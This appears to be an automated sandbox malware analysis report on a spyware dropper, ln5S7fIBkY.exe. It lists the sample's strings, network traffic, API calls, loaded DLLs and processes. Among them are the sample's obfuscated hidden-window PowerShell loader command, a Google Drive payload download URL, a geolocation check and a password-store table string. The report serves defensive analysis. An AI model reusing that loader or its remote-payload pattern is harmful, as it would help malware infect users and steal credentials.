Source: powershell.exe, 00000002.00000002.2341443338.0000000006407000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2341443338.0000000006407000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2341443338.0000000006407000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: msiexec.exe, 00000007.00000002.2760493798.0000000008E0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: msiexec.exe, 00000007.00000002.2760493798.0000000008E0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/3
Source: msiexec.exe, 00000007.00000002.2760493798.0000000008DCA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1YDOjrO-TMUNWWbj81mfMZC8-_SfrF2Cg
Source: msiexec.exe, 00000007.00000003.2492660590.0000000008E44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1YDOjrO-TMUNWWbj81mfMZC8-_SfrF2Cg&export=download
Source: msiexec.exe, 00000007.00000002.2760493798.0000000008E0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1YDOjrO-TMUNWWbj81mfMZC8-_SfrF2Cg&export=downloadl
Source: powershell.exe, 00000002.00000002.2337899026.00000000054F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2341443338.0000000006407000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: msiexec.exe, 00000007.00000002.2772117735.000000002474A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024794000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024758000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.00000000247A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: msiexec.exe, 00000007.00000002.2772117735.00000000247A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: msiexec.exe, 00000007.00000002.2772117735.000000002474A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024794000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024758000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.00000000247A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: msiexec.exe, 00000007.00000003.2492660590.0000000008E44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: msiexec.exe, 00000007.00000003.2492660590.0000000008E44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.google.com/translate_a/element.js
Source: msiexec.exe, 00000007.00000003.2492660590.0000000008E44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
Source: msiexec.exe, 00000007.00000003.2492660590.0000000008E44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: msiexec.exe, 00000007.00000003.2492660590.0000000008E44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: msiexec.exe, 00000007.00000003.2492660590.0000000008E44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: msiexec.exe, 00000007.00000003.2492660590.0000000008E44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: msiexec.exe, 00000007.00000003.2492660590.0000000008E44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49909
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49915
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49924
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49933

Source: unknown	HTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.9:49861 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.9:49871 version: TLS 1.2

Source: C:\Users\user\Desktop\ln5S7fIBkY.exe

Code function: 0_2_0040543E GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_0040543E

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\ln5S7fIBkY.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\ln5S7fIBkY.exe

Code function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040336C

Source: C:\Users\user\Desktop\ln5S7fIBkY.exe	Code function: 0_2_00404C7B	0_2_00404C7B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07E3CB4E	2_2_07E3CB4E
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_006BC190	7_2_006BC190
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_006BB328	7_2_006BB328
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_006BC470	7_2_006BC470
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_006BC752	7_2_006BC752
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_006BCA32	7_2_006BCA32
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_006B4AD9	7_2_006B4AD9
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_006BBBD2	7_2_006BBBD2
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_006BBEB0	7_2_006BBEB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_006BF007	7_2_006BF007
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_006BE528	7_2_006BE528
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_006BE517	7_2_006BE517
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_006B6730	7_2_006B6730
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_006B9858	7_2_006B9858
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_274511C0	7_2_274511C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_27450040	7_2_27450040
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2745E058	7_2_2745E058
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2745D340	7_2_2745D340
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2745D350	7_2_2745D350
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_27457B70	7_2_27457B70
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_274573D8	7_2_274573D8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_274573E8	7_2_274573E8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2745DBF1	7_2_2745DBF1
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2745D798	7_2_2745D798
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2745D7A8	7_2_2745D7A8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2745C648	7_2_2745C648
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2745FA59	7_2_2745FA59
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2745FA68	7_2_2745FA68
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2745F600	7_2_2745F600
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2745F610	7_2_2745F610
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2745C638	7_2_2745C638
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2745CEF6	7_2_2745CEF6
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2745CEF8	7_2_2745CEF8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2745CA9E	7_2_2745CA9E
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2745CAA0	7_2_2745CAA0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2745B940	7_2_2745B940
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_27450D51	7_2_27450D51
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2745ED50	7_2_2745ED50
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2745ED60	7_2_2745ED60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_27450D60	7_2_27450D60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_27450900	7_2_27450900
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2745E908	7_2_2745E908
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2745B930	7_2_2745B930
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2745C1E0	7_2_2745C1E0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2745C1F0	7_2_2745C1F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2745BD88	7_2_2745BD88
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_27457D90	7_2_27457D90
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2745BD98	7_2_2745BD98
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2745F1A9	7_2_2745F1A9
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_274511B0	7_2_274511B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2745F1B8	7_2_2745F1B8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2745E049	7_2_2745E049
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_27458460	7_2_27458460
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_27453860	7_2_27453860
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_27453870	7_2_27453870
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2745DC00	7_2_2745DC00
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_27450012	7_2_27450012
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2745B4D7	7_2_2745B4D7
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2745B4E8	7_2_2745B4E8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_274508F0	7_2_274508F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2745E8F8	7_2_2745E8F8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_27450490	7_2_27450490
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_274504A0	7_2_274504A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2745E4A0	7_2_2745E4A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2745E4B0	7_2_2745E4B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2748C388	7_2_2748C388
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2748AA58	7_2_2748AA58
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2748D670	7_2_2748D670
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_27488608	7_2_27488608
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2748B6E8	7_2_2748B6E8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2748BD38	7_2_2748BD38
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2748C9D8	7_2_2748C9D8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_274811A0	7_2_274811A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_27488C51	7_2_27488C51
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2748A408	7_2_2748A408
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2748D028	7_2_2748D028
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2748B0A0	7_2_2748B0A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_27486778	7_2_27486778
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2748C378	7_2_2748C378
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_27486776	7_2_27486776
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_27486312	7_2_27486312
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_27486320	7_2_27486320
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_27483730	7_2_27483730
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_27486BC1	7_2_27486BC1
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_27486BD0	7_2_27486BD0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2748A3F8	7_2_2748A3F8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_274833A8	7_2_274833A8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_274833B8	7_2_274833B8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2748AA48	7_2_2748AA48
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_27485A60	7_2_27485A60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2748D662	7_2_2748D662
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_27485A70	7_2_27485A70
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2748560A	7_2_2748560A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_27488602	7_2_27488602
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_27485618	7_2_27485618
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_27485EC8	7_2_27485EC8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2748B6D9	7_2_2748B6D9
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_27485EB8	7_2_27485EB8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_27480D48	7_2_27480D48
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_27487D48	7_2_27487D48
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_27487D58	7_2_27487D58
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_27487900	7_2_27487900
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2748BD28	7_2_2748BD28
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_27480D39	7_2_27480D39
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2748C9C8	7_2_2748C9C8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2748518A	7_2_2748518A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_27485198	7_2_27485198
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_27481191	7_2_27481191
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_274881A0	7_2_274881A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_274881B0	7_2_274881B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_27487049	7_2_27487049
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_27480040	7_2_27480040
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_27487050	7_2_27487050
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_27482818	7_2_27482818
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2748D018	7_2_2748D018
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_27484430	7_2_27484430
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_274808E0	7_2_274808E0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_274808F0	7_2_274808F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_274878F0	7_2_274878F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_27480488	7_2_27480488
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_2748B08F	7_2_2748B08F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_27480498	7_2_27480498
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_27487497	7_2_27487497
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_274874A8	7_2_274874A8

Source: ln5S7fIBkY.exe

Static PE information: invalid certificate

Source: ln5S7fIBkY.exe, 00000000.00000000.1510188691.00000000007D4000.00000002.00000001.01000000.00000003.sdmp

Binary or memory string: OriginalFilenameandebryst reneglect.exeDVarFileInfo$ vs ln5S7fIBkY.exe

Source: ln5S7fIBkY.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/12@4/4

Source: C:\Users\user\Desktop\ln5S7fIBkY.exe

0_2_0040336C

Source: C:\Users\user\Desktop\ln5S7fIBkY.exe

Code function: 0_2_004046FF GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004046FF

Source: C:\Users\user\Desktop\ln5S7fIBkY.exe

Code function: 0_2_00402104 CoCreateInstance,

0_2_00402104

Source: C:\Users\user\Desktop\ln5S7fIBkY.exe

File created: C:\Users\user\AppData\Local\downrange

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2036:120:WilError_03

Source: C:\Users\user\Desktop\ln5S7fIBkY.exe

File created: C:\Users\user\AppData\Local\Temp\nse4B5E.tmp

Jump to behavior

Source: ln5S7fIBkY.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Users\user\Desktop\ln5S7fIBkY.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\ln5S7fIBkY.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: msiexec.exe, 00000007.00000002.2772117735.0000000024822000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024812000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024830000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024864000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: ln5S7fIBkY.exe	Virustotal: Detection: 68%
Source: ln5S7fIBkY.exe	ReversingLabs: Detection: 62%

Source: C:\Users\user\Desktop\ln5S7fIBkY.exe

File read: C:\Users\user\Desktop\ln5S7fIBkY.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ln5S7fIBkY.exe "C:\Users\user\Desktop\ln5S7fIBkY.exe"
Source: C:\Users\user\Desktop\ln5S7fIBkY.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Appeachment=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Sharpness.Kon';$Oplandsavises=$Appeachment.SubString(12242,3);.$Oplandsavises($Appeachment)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Users\user\Desktop\ln5S7fIBkY.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Appeachment=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Sharpness.Kon';$Oplandsavises=$Appeachment.SubString(12242,3);.$Oplandsavises($Appeachment)"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior

Source: C:\Users\user\Desktop\ln5S7fIBkY.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ln5S7fIBkY.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\ln5S7fIBkY.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ln5S7fIBkY.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\ln5S7fIBkY.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ln5S7fIBkY.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\ln5S7fIBkY.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ln5S7fIBkY.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\ln5S7fIBkY.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\ln5S7fIBkY.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ln5S7fIBkY.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ln5S7fIBkY.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ln5S7fIBkY.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\ln5S7fIBkY.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\ln5S7fIBkY.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\ln5S7fIBkY.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\ln5S7fIBkY.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\ln5S7fIBkY.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\ln5S7fIBkY.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\ln5S7fIBkY.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ln5S7fIBkY.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ln5S7fIBkY.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ln5S7fIBkY.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
